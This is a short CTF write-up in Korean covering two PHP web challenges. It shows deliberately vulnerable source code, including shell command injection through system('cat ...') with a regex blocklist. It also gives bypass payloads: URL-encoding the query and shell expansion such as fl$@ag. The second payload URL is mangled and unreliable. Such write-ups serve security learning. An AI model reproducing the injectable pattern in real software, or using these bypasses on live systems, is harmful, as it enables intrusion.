<?php
error_reporting(0);
require __DIR__."/secret.php"; // flag is here
# waf
$url_query = parse_url($_SERVER['REQUEST_URI'], PHP_URL_QUERY);
if(stripos($url_query, 'flag') !== false){
die('no hack');
}
# routes
if(isset($_GET['author'])){
die('safflower');
}else if(isset($_GET['flag'])){
die($flag);
}else{
highlight_file(__FILE__);
die;
}
$_SERVER['REQUEST_URI'] 는 URL encoding을 처리해주지 않기 때문에 flag를 url encoding 하여 보내면 풀린다.
PAY = http://dm1536803965686.fun25.co.kr:23902/5099d288498b4e17/?%66%6c%61%67
FLAG : LAYER7{4f3a6c9f4b9c36ed3c39b8d3e14aa4fb}
<?php
require __DIR__.'/flag.php';
if(isset($_GET['file'])){
if(preg_match('/flag|\\'|\\"|`|\\\\\\\\|;|\\(|\\)|\\*|\\?|\\.\\.|\\//i', $_GET['file'])){
die('no hack');
}
system('cat "'.$_GET['file'].'"');
}else{
header('Location: ?file=test.txt');
}
echo '<hr>';
highlight_file(__FILE__);
fl$@ag == flag 로 bypass 할수있다.
PAY = http://dm1536803965686.fun25.co.kr:23903/74cdf2ead84d1743/[email protected]
FLAG : LAYER7{070e260558a03c1494817459ebbc060e}